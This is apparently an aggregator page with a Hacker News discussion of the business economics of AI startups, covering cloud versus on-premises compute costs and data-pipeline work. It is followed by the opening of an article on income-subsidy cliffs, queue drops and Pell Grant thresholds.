I ran a ML based 3D reconstruction service for 7 years - given face photos of a person, reconstruct a realistic 3D likeness. I licensed a finished 3D reconstruction algorithm, purchased $50K worth of servers plus a federal reserve bank quality hardware firewall, and put it all in a Los Angeles downtown co-lo (the former Enron data center, actually.) I paid $600 a month to run that, as opposed to the equal compute capability being $96K per month if run at Amazon.

It kills me to see people being raped by the cloud, but everyone just lines up like good little boys...

andrew311(4248) about 15 hours ago [-]

What colo company did you use?

dmak(4019) about 16 hours ago [-]

How did you estimate your hardware needs?

eyegor(3683) about 16 hours ago [-]

Yes, it's quite obvious when you actually have compute needs. At my current employer, we spent about 100k to build a small single purpose hpc. One year later, I calculated the azure costs (help bargain for more servers) would have been around 1.5m. This is almost 24/7 use though, and add another ~150k in electricity.

burnte(4294) about 16 hours ago [-]

I did similar at my current and last job. Rather than spend $24k/month, I spent $50k, bought a shitton of hardware, built a virtualization cluster at Corp, and upgraded our connections. Accounting thought i was a wizard.

marcus_holmes(4163) about 9 hours ago [-]

the point of Cloud is that it solves the problem of variable demand.

I used to run on-prem back in the 2000's, and we were constantly dealing with demand fluctuation crises. Spinning up new physical servers to deal with new demand, or being massively over-specced when demand dropped, was a real pain.

I'm starting a new thing this week, and using the Cloud for it because I have no idea what our demand will be. I can start small, scale up with our customer growth, and never have to worry about ordering new servers a month in advance so I have enough capacity when (or if) I need it.

At some point in the future, when our needs are clear and relatively stable, it might make sense to migrate to on-prem and save those costs.

seibelj(2509) about 20 hours ago [-]

I wrote an article I published a week ago about how AI is the biggest misnomer in tech history https://medium.com/@seibelj/the-artificial-intelligence-scam...

I wrote it to be tongue-in-cheek in a ranting style, but essentially 'AI' businesses and the technology underpinning it are not the silver bullet the media and marketing hype has made it out to be. The linked article about a16z shows how AI is the same story everywhere - enormous capital to get the data and engineers to automate, but even the 'good' AI still gets it wrong much of the time, necessitating endless edge-cases, human intervention, and eventually it's a giant ball of poorly-understand and impossible to maintain pipelines that don't even provide a better result than a few humans with a spreadsheet.

scottlocklin(2490) about 15 hours ago [-]

Coming from a fellow masshole: that's a great rant.

There was this meme in the 70s about 'self driving cars' following magnetic strips in the road in restricted highways. I remember at the time, being, like 8 and thinking 'sure seems like an overly complicated train.'

ativzzz(10000) about 19 hours ago [-]

I agree with the author's opinion about

> I'll go out on a limb and assert that most of the up front data pipelining and organizational changes which allow for it are probably more valuable than the actual machine learning piece.

Especially at non-tech companies with outdated internal technology. I've consulted at one of these and the biggest wins from the project (I left before the whole thing finished unfortunately) were overall improvements to the internal data pipeline, such as standardization and consolidation of similar or identical data from different business units.

noelsusman(10000) about 19 hours ago [-]

I do data science at a non-tech company with outdated internal technology and I've seen this over and over again. Honestly though, it's worth every penny because often the only way to get the resources to truly solve data pipeline issues is to get an executive to buy some crap from a vendor and force everyone to make it work.

jotakami(10000) about 15 hours ago [-]

I was a consultant at one of the giant outsourcers and nod my head vigorously at this comment. The least sexy projects were MDM (master data management) but they were absolutely essential to the success of any other fancy analytics/BI/ML project.

fxtentacle(4197) about 18 hours ago [-]

I predict a great future for startups that sell pickaxes, err, tools for AI.

AI is like the new gold rush. And just like back then, it's not the gold diggers that will get rich.

'Most people in AI forget that the hardest part of building a new AI solution or product is not the AI or algorithms — it's the data collection and labeling.'

https://medium.com/startup-grind/fueling-the-ai-gold-rush-7a...

(from 2017)

moksly(10000) about 18 hours ago [-]

Is it the new gold rush though. I work in a large organisation that has a lot of data and inefficient processes, and we haven't bought anything.

It hasn't been for a lack of trying. We've had everyone from IBM and Microsoft to small local AI startup try to sell us their magic, but no one has come up with anything meaningful to do with our data that our analysis department isn't already doing without ML/AI. I guess we could replace some of our analysis department with ML/AI, but working with data is only part of what they do, explaining the data and helping our leadership make sound decisions is their primary function, and it's kind of hard for ML/AI to do that (trust me).

What we have learned though, is that even though we have a truck load of data, we can't actually use it unless we have someone on deck who actually understands it. IBM had a run at it, and they couldn't get their algorithms to understand anything, not even when we tried to help them. I mean, they did come up with some basic models that their machine spotted/learned by itself by trawling through our data, but nothing we didn't already have. Because even though we have a lot of data, the quality of it is absolute shite. Which is anecdotal, but it's terrible because it was generated by thousand of human employees over 40 years, and even though I'm guessing, I doubt we're unique in that aspect.

We'll continue to do various proof of concepts and listen to what suppliers have to say, but I fully expect most of it to go the way Blockchain did which is where we never actually find a use for it.

With a gold rush, you kind of need the nuggets of gold to sell, and I'm just not seeing that with ML/AI. At least no yet.

hooande(3824) about 18 hours ago [-]

AI != gold. The market for selling tools to people who are essentially chasing buzz words is much smaller than that of selling tools to people extracting scarce metals from the ground.

Ultimately the value of selling tools is dependent on the riches being mined actually existing. The value of AI/big data to the average business has yet to be determined

b0b10101(4028) about 18 hours ago [-]

>'Most people in AI forget that the hardest part of building a new AI solution or product is not the AI or algorithms — it's the data collection and labeling.'

A lot of those companies are styled as 'AI' companies themselves, aiming to automate the process of labeling.

The main winner here really is Amazon. They get a chunk by serving up infrastructure and in labeling through mechanical turk.

m0zg(10000) about 20 hours ago [-]

'Huge compute bills' usually come from training, or to be more precise, hyperparameter search that's required before you find a model that works well. You could also fail to find such a model, but that's another discussion.

So yeah, you could spend one or two FTE salaries' (or one deep learning PhD's) worth of cash on finding such models for your startup if you insist on helping Jeff Bezos to wipe his tears with crisp hundred dollar bills. That's if you know what you're doing of course. Literally unlimited amounts could be spent if you don't. Or you could do the same for a fraction of the cost by stuffing a rack in your office with consumer grade 2080ti's. Just don't call it a 'datacenter' or NVIDIA will have a stroke. Is that too much money? Not in most typical cases, I'd think. If the competitive advantage of what you're doing with DL does not offset the cost of 2 meatspace FTEs, you're doing it wrong.

That, once again, assumes that you know what you're doing, and aren't doing deep learning for the sake of deep learning.

Also, if your startup is venture funded, AWS will give you $100K in credit, hoping that you waste it by misconfiguring your instances and not paying attention to their extremely opaque billing (which is what most of their startup customers proceed to doing pretty much straight away). If you do not make these mistakes, that $100K will last for some time, after which you could build out the aforementioned rack full of 2080ti's on prem.

zitterbewegung(357) about 18 hours ago [-]

I was training ML models on AWS / Google Colab. After racking up a few hundred dollars on AWS I bought a Titan RTX (I also play video games so it does that very well also.

artsyca(4100) about 18 hours ago [-]

Slow clap

bob1029(10000) about 19 hours ago [-]

I find it fun how the cost of the cloud is forcing people to consider what absolutely must run in the cloud (presumably for stability and compliance reasons) and what can be brought back on-prem.

We don't train ML models, but we are in a similar boat regarding cloud compute costs. Building our solutions for our clients is a compute-heavy task which is getting expensive in the cloud. We are considering options such as building commodity threadripper rigs, throwing them in various developers' (home) offices, installing a VPN client on each and then attaching as build agents to our AWS-hosted jenkins instance. In this configuration we could drop down to a t3a.micro for Jenkins and still see much faster builds. The reduction in iteration time over a month would easily pay for the new hardware. An obvious next step up from this is to do proper colocation, but I am of a mindset that if I have to start racking servers I am bringing 100% of our infrastructure out of the cloud.

calebkaiser(4056) about 17 hours ago [-]

Inference is also becoming a bigger contributor to compute bills, especially as models get bigger. With big models like GPT-2, its not unheard of for teams to scale up to hundreds of GPU instances to handle a surprisingly small number of concurrent users. Things can get expensive pretty quick.

pridkett(10000) about 19 hours ago [-]

There's also the issue that data scientists often want to go running to hyperparameter optimization and neural architecture search. In most cases improving your data pipelines and ensuring the data are clean and efficient will pay off much more quickly.

liuliu(3400) about 17 hours ago [-]

I've been playing with custom-built 2080 Ti workstation for a while: https://www.youtube.com/watch?v=OF3JYEIsjH8

Several issues: 1. electricity bill is still an issue, I've been paying anywhere between $500 to $1000 per month for this workstation (always have something to train). 2. something with a decent memory size (Titan RTX and RTX 8000) cost way too much; 3. once you reached a point of 4-2080Ti-is-not-fast-enough, power management and connectivity setup would be a nightmare.

Would love to know other people's opinions on the on-prem setup, especially whether a consumer-grade 10Ghe is enough for connectivity-wise.

paulddraper(4100) about 18 hours ago [-]

> Also, if your startup is venture funded, AWS will give you $100K in credit

AFAIK that is limited to <$20k and it expires.

fxtentacle(4197) about 19 hours ago [-]

No, also inference is quite expensive. You'll have 100% usage on a $10,000 GPU for 3s per customer image for a decently sized optical flow network. That's 3 hours of compute time for 1 minute of 60fps video.

Now let's say your customer wants to analyze 2 hours = 120 minutes of video and doesn't want to wait more than those 3 hours, then suddenly you need 120 servers with one $10k GPU each to service this one customer within 3 hours of waiting.

Good luck reaching that $1,200,000 customer lifetime value to get a positive ROI on your hardware investment.

When I talk about AI, I usually call it 'beating the problem to death with cheap computing power'. And looking at the average cleverness of AI algorithm training formulas, that seems to be exactly what everyone else is doing, too.

And since I'm being snarky anyway, there's two subdivisions to AI:

supervised learning => remember this

unsupervised learning => approximate this

Both approaches don't put much emphasis on intelligence ;) And both approaches can usually be implemented more efficiently without AI, if you know what you are doing.

ignoramous(2353) about 19 hours ago [-]

As someone hoping to build a world-wide footprint, say 25 to 50 DCs, of servers to deploy to with unmetered bandwidth, what are some alternatives to the usual suspects?

I have come across fly.io, Vultr, Scaleway, Stackpath, Hetzner, and OVH but either they are expensive (in that they charge for bandwidth and uptime) or do not have a wide enough foot-print.

I guess colos are the way to go, but how does one work with colos, allocate servers, deploy to them, ensure security and uptime and so on from a single place, 'cause dealing with them individually might slow down the process? Is there a tooling that deals with multi-colos like the ones for multi-cloud like min.io, k8s, Triton etc;

avip(4182) about 20 hours ago [-]

For balance, all big cloud providers - aws, gcp, azure, oracle [0] have pretty similar startup plans. Y$$MV

(I'm in full agreement with everything you've written + it's well-phrased and funny. gj!)

[0] that's not a typo - there is such thing as 'Oracle cloud'

alephnan(4298) about 19 hours ago [-]

> Just don't call it a 'datacenter' or NVIDIA will have a stroke.

Context please :) ?

walshemj(4216) about 17 hours ago [-]

Yep if you getting huge bills you should be doing on prem HPC eg where a 15k budget means 15kw per container and your into exotic network designs where 10g wont cut it any more.

eg from 2011 6400 Hadoop nodes like http://bradhedlund.com/2011/11/05/hadoop-network-design-chal...

God only knows what fun you could get up to with modern tech - I miss bleeding edge rnd

fizixer(10000) about 19 hours ago [-]

- Or AMD could change their policy of 'never miss an opportunity to miss an opportunity' and offer high-performance OpenCL GPGPU offerings. Then nVidia could have all the stroke they wanted.

- Or Tensorflow/Pytorch could've crapped on OpenCL a little less by releasing a fully functional OpenCL version everytime they released a fully functional Cuda version, instead of worshipping Cuda year in and year out.

- Or Google could start selling their TPUv2, if not TPUv3, while they're on the verge of releasing TPUv4.

- Or one of the other big-tech's Facebook/Microsoft/Intel could make and start selling a TPU-equivalent device.

- Or I could finish school and get funded to do all/most of the above ;)

edit: On a more serious note, a cloud/on-prem hybrid is absolutely the right way to go. You should have a 4x 2080 ti rig available 24x7 for every ML engineer. It costs about $6k-8k a piece [0]. Prototype the hell out of your models on on-prem hardware. Then when your setup is in working condition and starts producing good results on small problems, you're ready to do a big computation for final model training. Then you send it to the cloud, for final production run. (Guess what, on a majority of your projects, you might realize, the final production run could be carried out on on-prem itself; you just have to keep it running 24 hours-a-day for a few days or up to a couple weeks.)

[0]: https://l7.curtisnorthcutt.com/the-best-4-gpu-deep-learning-...

correlator(4315) about 20 hours ago [-]

No need to look at AZ for this. If you're building 'AI' I wish you a speedy road to being acquired by a company that can put it to use. You've become a high priced recruiting firm.

If you're solving a real problem and use ML in service of solving that problem, then you've got a great moat....happy trusting customers.

It's not complicated

motohagiography(4284) about 18 hours ago [-]

Sssh! Valuations are a function of projected market size and opacity of the problem. Clarity like this collapses the uncertainty and destroys value. If you pour enough capital into rooms full of PhD's something's gotta hit.

My way of saying, you're very, very right.

inthewoods(4080) about 16 hours ago [-]

Having briefly worked for an AI company, I agree with the conclusion that AI companies are more like services businesses than software companies. I would add only one other thing: to me going forward there likely won't be 'AI companies' - AI exists to power applications. And in my experience, unless the output is truly differentiated, customers aren't willing to spend more for something 'powered by AI' - they just expect that software has evolved to provide the kind of insights that AI sometimes deliver.

shoo(4257) about 15 hours ago [-]

For an example of a genuine software company vaguely in this ecosystem, consider companies that build the tools that some AI/ML/optimisation systems use as building blocks. Eg optimisation algorithms.

If you need to solve gnarly industrial scale mixed integer combinatorial optimisation problems in the guts of your ML / optimisation engine, the commercial MIP solvers (gurobi , CPLEX ) or non-MIP based alternative combinatorial optimisation systems (localsolver ) can often give more optimal results in exponentially less running time than free open source alternatives.

1% more optimal solutions might translate into 1% more net profit for the entire org if you've gone whole hog and are trying to systematically profit optimise the entire business, so depending on the scale of the org it might be an easy business case to invest a few million dollars to set this system in place.

Annual server licenses for this commerical MIP solver software was 0(100k) / yr per server & the companies that build these products bake a lot of clever tricks from academia into these products that you can exploit by paying the license fee. ( my knowledge of pricing is out of date by about 7 years ) .

mapgrep(4261) about 15 hours ago [-]

Aren't software businesses increasingly like service businesses though?

They deliver now often with backend cloud storage, update near continuously, integrate frequently with outside services, sometimes open source major components iteratively, typically have an evolving API and developer ecosystem to educate, and are sold as subscriptions. It's not as "human in the loop" as some of the AI described in this article but it's clearly moving toward services in terms of margins.

Nothing is like the old shrink wrapped software business, basically.

lazzlazzlazz(10000) about 20 hours ago [-]

Is the misspelling of 'Andreessen-Horowitz' and use of 'A19H' instead of 'a16z' intentional?

scottlocklin(2490) about 19 hours ago [-]

I suck at spelling. If I was one of the cool kids I'd claim to be dyslexic.

khazhoux(10000) about 20 hours ago [-]

You mean the fact that they left out an 's' in Andreessen?

allovernow(4302) about 19 hours ago [-]

All of this might be true currently, but that's because this current first generation 'AI' (technically should just be called ML) is mostly bullshit. To clarify, I don't mean anyone is lying or selling snake oil - what I mean by bullshit is that the vast majority of these services are cooked up by software developers without any background in mathematics, selling adtechy services in domains like product recommendation and sentiment analysis. They are single discipline applications accessable to devs without science backgrounds and do not rely on substantial expertise from other fields. That makes them narrow in technical scope and easy to rip off (hence no moat, lots of competition, and human reliance and lack of actual software).

The next generation of Machine Learning is just emerging, and looks nothing like this. Funds are being raised, patents are being filed, and everything is in early stage development, so you probably haven't heard much yet - but these ML startups are going after real problems in industry: cross disciplinary applications leveraging the power of heuristic learning to make cross disciplinary designs and decisions currently still limited to the human domain.

I'm talking about the kind of heuristics which currently exist only as human intuition expressed most compactly as concept graphs and, especially, mathematical relationships - e.g. component design with stress and materials constraints, geologic model building, treatment recommendation from a corpus of patient data, etc. ML solutions for problems like these cannot be developed without an intimate understanding of the problem domain. This is a generalist's game. I predict that the most successful ML engineers of the next decade will be those with hard STEM backgrounds, MS and PhD level, who have transitioned to ML. [Un]Fortunately for us, the current buzzwordy types of ML services give the rest of us a bad name, but looking at these upcoming applications the answers to the article tl;dr look different:

>Deep learning costs a lot in compute, for marginal payoffs

The payoffs here are far greater. Designs are in the pipeline which augment industry roles - accelerate design by replacing finite methods with vastly quicker ML for unprecedented iteration. Produce meaningful suggestions during the development of 3D designs. Fetch related technical documents in real time by scanning the progressive design as the engineer works, parsing and probabilistically suggesting alternative paths to research progression. Think Bonzi Buddy on steroids...this is a place for recurring software licenses, not SaaS.

>Machine learning startups generally have no moat or meaningful special sauce

For solving specific, technical problems, neural network design requires a certain degree of intuition with respect to the flow of information through the network, which both optimizes and limits the kind of patterns that a given net can learn. Thus designing NN for hard-industry applications is predicated upon an intimate understanding of domain knowledge, and these highly specialized neural nets become patentable secret sauces. That's half of the most - the other comes from competition for the software developers with first-hand experience in these fields, or a general enough math heavy background to capture the relationships that are being distilled into nets.

>Machine learning startups are mostly services businesses, not software businesses

Again only true because most current applications are NLP adtechy bullshit. Imagine coding in an IDE powered by an AI (multiple interacting neural nets) which guides the structure of your code at a high level and flags bugs as you write. This, at a more practical level, is the type of software that will eventually change every technical discipline, and you can sell licenses!

>Machine learning will be most productive inside large organizations that have data and process inefficiencies

This next generation goes far past simply optimizing production lines or counting missed pennies or extracting a couple extra percent of value from analytics data. This style of applied ML operates at a deeper level of design which will change everything.

scottlocklin(2490) about 19 hours ago [-]

>The next generation of Machine Learning is just emerging, and looks nothing like this. Funds are being raised, patents are being filed, and everything is in early stage development, so you probably haven't heard much yet ...

Citations needed. Large claims: presumably you can name one example of this, and hopefully it's not a company you work at.

I've seen projects on literally all the things you mention: materials science, medical stuff, geology/prospecting -none of them worked well enough to build a stand alone business around them. I do know the oil companies are using DL ideas with some small successes, but this only makes sense for them, as they've been working on inverse problems for decades. None of them buy canned software/services: it's all done in house. Probably always will be, same as their other imaging efforts.

rossdavidh(4220) about 19 hours ago [-]

So, way back in the last millenium, I did my Master's thesis (way smaller deal than a Ph.D. thesis) on neural networks. Since then, I have looked in on it every few years. I think they're cool, I like using them, and writing multi-level backpropagation neural networks used to be one of the first things I'd do in a new language, just to get a feel for how it worked (until pytorch came along and I decided for the first time that using their library was easier than writing my own).

So, it's not like I dislike ML. But, saying an investment is an 'AI' startup, ought to be like saying it's a python startup, or saying it's a postgres startup. That ought not to be something you tell people as a defining characteristic of what you do, not because it's a secret but rather because it's not that important to your odds of success. If you used a different language and database, you would probably have about the same odds of success, because it depends more on how well you understand the problem space, and how well you architect your software.

Linear models or other more traditional statistical models can often perform just as well as DL or any other neural network, for the same reason that when you look at a kaggle leaderboard, the difference between the leaders is usually not that big after a while. The limiting factor is in the data, and how well you have transformed/categorized that data, and all the different methods of ML that get thrown at it all end up with similar looking levels of accuracy.

There used to be a saying: 'If you don't know how to do it, you don't know how to do it with a computer.' AI boosters sometimes sound as if they are suggesting that this is no longer true. They're incorrect. ML is, absolutely, a technique that a good programmer should know about, and may sometimes wish to use, kind of like knowing how a state machine works. It makes no great deal of difference to how likely a business is to succeed.

7532yahoogmail(10000) about 18 hours ago [-]

Thank you for the perspective. Now when we talk machine learning are we talking:

L. Pachter and B. Sturmfels. Algebraic Statistics for Computational Biology. Cambridge University Press 2005.

G. Pistone, E. Riccomango, H. P. Wynn. Algebraic Statistics. CRC Press, 2001. Drton, Mathias, Sturmfels, Bernd, Sullivant, Seth. Lectures on Algebraic Statistics, Springer 2009.

Or more like:

Watanabe, Sumio. Algebraic Geometry and Statistical Learning Theory, Cambridge University Press 2009.

My understanding (I do not do AI or machine learning) that AI is distinct from these more mathematical analytic perspectives.

Finally, might we argue that generally AI/ML is more easily suited to data that's already high quality eg. CERN data, trade data, drug trial data as opposed to unconstrained data eg. Find the buses in these 1MM jpegs?

phreeza(707) about 16 hours ago [-]

> There used to be a saying: 'If you don't know how to do it, you don't know how to do it with a computer.'

This is a tautology in the narrow sense, but in the broader sense I think there surely exist things that humans don't 'know' how to do without a computer, but know how to do with a computer. And the space of solveable problems is expanding, though AI is only a narrow slice of that.

justinmeiners(4320) about 16 hours ago [-]

> If you don't know how to do it, you don't know how to do it with a computer.

This is so true. We spent decades educating non-technical people that understanding a problem well is a prerequisite to programming it. Take something easy to understand like driving a car, doing it in a computer is now harder.

AI is undoing all that. People reach a vague problem they can't describe and assume computers will magically fix it.

Tostino(2992) about 18 hours ago [-]

Well the term Postgres or Python startup may not make sense, but a Pytorch or TensorFlow startup may not either. A database startup though, tells me the company is likely going to be in the database field, and most likely is going to try and sell me something I don't need. An AI startup, similarly, is going to either be utilizing existing techniques on industry problems to sell me something I don't need, or making some novel improvement to the training or inference to sell me something else I don't need.

So...yeah.

jedberg(2119) about 18 hours ago [-]

Saying that you're going to 'use AI' is more akin to saying 'we're going to have a web application' back in 1998.

Back then a lot of startups didn't have websites, because they were making other products (hardware, boxed software, etc). If they had a website it was just a marketing page.

So saying that you were going to make a 'web application' did in fact differentiate you, in that it showed your approach was very different from the boxed software folks, but it didn't tell you much beyond that.

aj7(4016) about 18 hours ago [-]

" Embrace services. There are huge opportunities to meet the market where it stands. That may mean offering a full-stack translation service rather than translation software or running a taxi service rather than selling self-driving cars. Building hybrid businesses is harder than pure software, but this approach can provide deep insight into customer needs and yield fast-growing, market-defining companies. Services can also be a great tool to kickstart a company's go-to-market engine – see this post for more on this – especially when selling complex and/or brand new technology. The key is pursue one strategy in a committed way, rather than supporting both software and services customers."

Exactly wrong and contradicts most of the thesis of the article - that AI often fails to achieve acceptable models because of the individuality, finickiness, edge cases, and human involvement needed to process customer data sets.

The key to profitability is for AI to be a component in a proprietary software package, where the VENDOR studies, determines, and limits the data sets and PRESCRIBES this to the customer, choosing applications many customers agree upon. Edge cases and cat-guacamole situations are detected and ejected, and the AI forms a smaller, but critical efficiency enhancing component of a larger system.

TheOtherHobbes(4310) about 17 hours ago [-]

The thesis of the article is that this is going to be called consultancy.

Single-focus disruptors bad. Generic consultancy good - with ML secret sauce, possibly helped by hired specialist human insight.

Companies that can make this work will kill it. Companies that can't will be killed.

It's going to be IBM, Oracle, SAP, etc all over again. Within 10 years there will be a dominant monopolistic player in the ML space. It will be selling corporate ML-as-a-service, doing all of that hard data wrangling and model building etc and setting it up for clients as a packaged service using its own economies of scale and 'top sales talent' (it says here).

That's where the big big big big money will be. Not in individual specialist 'We ML'd your pizza order/pet food/music choices/bicycle route to work' startups.

Amazon, Google, MS, and maybe the twitching remnants of IBM will be fighting it out in this space. But it's possible they'll get their lunch money stolen by a hungry startup, perhaps in collaboration with someone like McKinsey, or an investment bank, or a quant house with ambitions.

5-10 years after that customisable industrial-grade ML will start trickling down to the personal level. But it will probably have been superseded by primitive AGI by then, which makes prediction difficult - especially about that future.

shoo(4257) about 16 hours ago [-]

> most people haven't figured out that ML oriented processes almost never scale like a simpler application would. You will be confronted with the same problem as using SAP; there is a ton of work done up front; all of it custom. I'll go out on a limb and assert that most of the up front data pipelining and organizational changes which allow for [ML to be used operationally by an org] are probably more valuable than the actual machine learning piece.

Strong agreement from me: I've never worked on deploying ML models, but have worked on deploying operations-research type automated decision systems that have somewhat similar data requirements. Most of the work is client org specific in terms of setting up the human & machine processes to define a data pipeline to provide input and consume output of the clever little black box. A lot of this is super idiosyncratic & non repeatable between different client deployments.

izendejas(4257) about 15 hours ago [-]

That's because, ML and operations-research problems can be simplified to set of optimization problems and the underlying math and statistics are all very similar if not identical in some cases.

And the input matters, a lot. So the differentiating factor isn't the models, it's the data and companies like Google figured it out a long time ago.

In short, find interesting problems, then the solutions -- not the other way around.

amai(3380) about 2 hours ago [-]

'(my personal bete-noir; the term "AI" when they mean "machine learning")'

This is so right. Using a term 'artificial intelligence' for machine learning is like using 'artificial horses' to describe cars. It is even worse, since we cannot even define what 'natural intelligence' actually is. Stop talking about 'artificial intelligence'.

DonHopkins(3269) about 1 hour ago [-]

Or 'artificial swans' that 'appear even more lifelike'.

https://www.louwmanmuseum.nl/ontdekken/ontdek-de-collectie/b...

>The bodywork represents a swan gliding through water. The rear is decorated with a lotus flower design finished in gold leaf, an ancient symbol for divine wisdom. Apart from the normal lights, there are electric bulbs in the swan's eyes that glow eerily in the dark. The car has an exhaust-driven, eight-tone Gabriel horn that can be operated by means of a keyboard at the back of the car. A ship's telegraph was used to issue commands to the driver. Brushes were fitted to sweep off the elephant dung collected by the tyres. The swan's beak is linked to the engine's cooling system and opens wide to allow the driver to spray steam to clear a passage in the streets. Whitewash could be dumped onto the road through a valve at the back of the car to make the swan appear even more lifelike.

>The car caused panic and chaos in the streets on its first outing and the police had to intervene.

harias(3449) about 20 hours ago [-]

>That's right; that's why a lone wolf like me, or a small team can do as good or better a job than some firm with 100x the head count and 100m in VC backing.

goes on to say

>I agree, but the hockey stick required for VC backing, and the army of Ph.D.s required to make it work doesn't really mix well with those limited domains, which have a limited market.

Choose one?

Also assumes running your own data center to be easy. Some people don't want to be up 24x7 monitoring their data center or to buy hardware to accommodate the rare 10 minute peaks in usage.

sp527(4153) about 13 hours ago [-]

Training ML models usually doesn't have the same uptime requirements as production systems. If your training goes down for a bit, it probably won't make much difference to the underlying business, in most cases.

That's why the author found it glaringly obvious that it should be brought in-house. It's often both the most costly and most "in-housable" compute work involved in these companies.

detaro(2041) about 18 hours ago [-]

> Some people don't want to be up 24x7 monitoring their data center or to buy hardware to accommodate the rare 10 minute peaks in usage.

Do you need that for training workloads, and what percentage of a startups workload is training?

jjeaff(4208) about 19 hours ago [-]

>rare 10 minute peaks

But is that really the use case here? I haven't worked in ML. But I'm not seeing where you are going to need to handle a 10 minute spike that requires a whole datacenter.

A month's worth of a quad gpu instance on AWS could pay for a server with similar capacity in a few months of usage.

And hardware is pretty resilient these days. Especially if you co-locate it in a datacenter that handles all the internet and power up time for you. And when something does go wrong, they offer 'magic hands' service to go swap out hardware for you. Colocation is surprisingly cheap. As is leasing 'managed' equipment.

bsenftner(4284) about 15 hours ago [-]

I ran a small data cluster for years, the horsepower behind my startup. Other than the Chinese DDoS attacks, running the cluster was absolutely elementary. The idea that running a server or a band of servers is difficult is a bold faced lie. People have got to stop repeating the cloud propaganda.

icheishvili(10000) about 19 hours ago [-]

I don't think these are necessarily contradictory. With pytorch-transformers, you can use a full-blown BERT model like the best in the world. And yet, to make this novel and defensible, you would need to build on top of it and innovate significantly, which would require significant capital to achieve.

brundolf(1517) about 19 hours ago [-]

> Training a single AI model can cost hundreds of thousands of dollars (or more) in compute resources

Why don't they buy their own hardware for this part? The training process doesn't need to be auto-scalable or failure-resistant or distributed across the world. The value proposition of cloud hosting doesn't seem to make sense here. Surely at this price the answer isn't just 'it's more convenient'?

KaiserPro(10000) about 19 hours ago [-]

because you are trading speed for cash.

Say you have $8M in funding, and you need to train a model to do x

You can either:

a) gain access to a system that scale ondemand and allows instant, actionable results.

b) hire a infrastructure person, someone to write a K8s deployment system. Another person to come in a throw that all away. Another person to negotiate and buy the hardware, and another to install it.

Option b is can be the cheapest in the long term, but it carries the most risk of failing before you've even trained a single model. It also costs time, and if speed to market is your thing, then you're shit out of luck.

GaryNumanVevo(10000) about 19 hours ago [-]

If you're in a position where you need to train a large network: first, I feel bad for you. second, you'll need additional machines to train in a reasonable amount of time.

ML distributed training is all about increasing training velocity and searching for good hyperparameters

etrk(10000) about 9 hours ago [-]

I interviewed at some AI companies a year or two back. They all had teams of people dedicated to support each client: to clean their data, train their models, integrate the domain-specific requirements, customize UIs, etc. They sold themselves as the next AI-powered mega-unicorns, but they were more like boutique consultancies with no obvious path to scale up.

auxten(4111) about 9 hours ago [-]

'Boutique Consultancy' is quite recapitulative for most AI companies for now. But this may be the only way to empower their clients. One of these startups will find the path to scale up eventually.





Historical Discussions: Suspicious Discontinuities (February 20, 2020: 635 points)

(637) Suspicious Discontinuities

637 points 5 days ago by janvdberg in 164th position

danluu.com | Estimated reading time – 19 minutes | comments | anchor

Suspicious discontinuities

If you read any personal finance forums late last year, there's a decent chance you ran across a question from someone who was desperately trying to lose money before the end of the year. There are a number of ways someone could do this; one commonly suggested scheme was to buy put options that were expected to expire worthless, allowing the buyer to (probably) take a loss.

One reason people were looking for ways to lose money was that, in the U.S., there's a hard income cutoff for a health insurance subsidy at $48,560 for individuals (higher for larger households; $100,400 for a family of four). There are a number of factors that can cause the details to vary (age, location, household size, type of plan), but across all circumstances, it wouldn't have been uncommon for an individual going from one side of the cut-off to the other to have their health insurance cost increase by roughly $7200/yr. That means if an individual buying ACA insurance was going to earn $55k, they'd be better off reducing their income by $6440 and getting under the $48,560 subsidy ceiling than they are earning $55k.

Although that's an unusually severe example, U.S. tax policy is full of discontinuities that disincentivize increasing earnings and, in some cases, actually incentivize decreasing earnings. Some other discontinuities are the TANF income limit, the Medicaid income limit, the CHIP income limit for free coverage, and the CHIP income limit for reduced-cost coverage. These vary by location and circumstance; the TANF and Medicaid income limits fall into ranges generally considered to be 'low income' and the CHIP limits fall into ranges generally considered to be 'middle class'. These subsidy discontinuities have the same impact as the ACA subsidy discontinuity -- at certain income levels, people are incentivized to lose money.

Anyone may arrange his affairs so that his taxes shall be as low as possible; he is not bound to choose that pattern which best pays the treasury. There is not even a patriotic duty to increase one's taxes. Over and over again the Courts have said that there is nothing sinister in so arranging affairs as to keep taxes as low as possible. Everyone does it, rich and poor alike and all do right, for nobody owes any public duty to pay more than the law demands.

If you agree with the famous Learned Hand quote then losing money in order to reduce effective tax rate, increasing disposable income, is completely legitimate behavior at the individual level. However, a tax system that encourages people to lose money, perhaps by funneling it to (on average) much wealthier options traders by buying put options, seems sub-optimal.

A simple fix for the problems mentioned above would be to have slow phase-outs instead of sharp thresholds. Slow phase-outs are actually done for some subsidies and, while that can also have problems, they are typically less problematic than introducing a sharp discontinuity in tax/subsidy policy.

In this post, we'll look at a variety of discontinuities.

Hardware or software queues

A naive queue has discontinuous behavior. If the queue is full, new entries are dropped. If the queue isn't full, new entries are not dropped. Depending on your goals, this can often have impacts that are non-ideal. For example, in networking, a naive queue might be considered 'unfair' to bursty workloads that have low overall bandwidth utilization because workloads that have low bandwidth utilization 'shouldn't' suffer more drops than workloads that are less bursty but use more bandwidth (this is also arguably not unfair, depending on what your goals are).

A class of solutions to this problem are random early drop and its variants, which gives incoming items a probability of being dropped which can be determined by queue fullness (and possibly other factors), smoothing out the discontinuity and mitigating issues caused by having a discontinuous probability of queue drops.

This post on voting in link aggregators is fundamentally the same idea although, in some sense, the polarity is reversed. There's a very sharp discontinuity in how much traffic something gets based on whether or not it's on the front page. You could view this as a link getting dropped from a queue if it only receives N-1 votes and not getting dropped if it receives N votes.

Pell Grants started getting used as a proxy for how serious schools are about helping/admitting low-income students. The first order impact is that students above the Pell Grant threshold had a significantly reduced probability of being admitted while students below the Pell Grant threshold had a significantly higher chance of being admitted. Phrased that way, it sounds like things are working as intended.

However, when we look at what happens within each group, we see outcomes that are the opposite of what we'd want if the goal is to benefit students from low income families. Among people who don't qualify for a Pell Grant, it's those with the lowest income who are the most severely impacted and have the most severely reduced probability of admission. Among people who do qualify, it's those with the highest income who are mostly likely to benefit, again the opposite of what you'd probably want if your goal is to benefit students from low income families.

We can see these in the graphs below, which are histograms of parental income among students at two universities in 2008 (first graph) and 2016 (second graph), where the red line indicates the Pell Grant threshold.

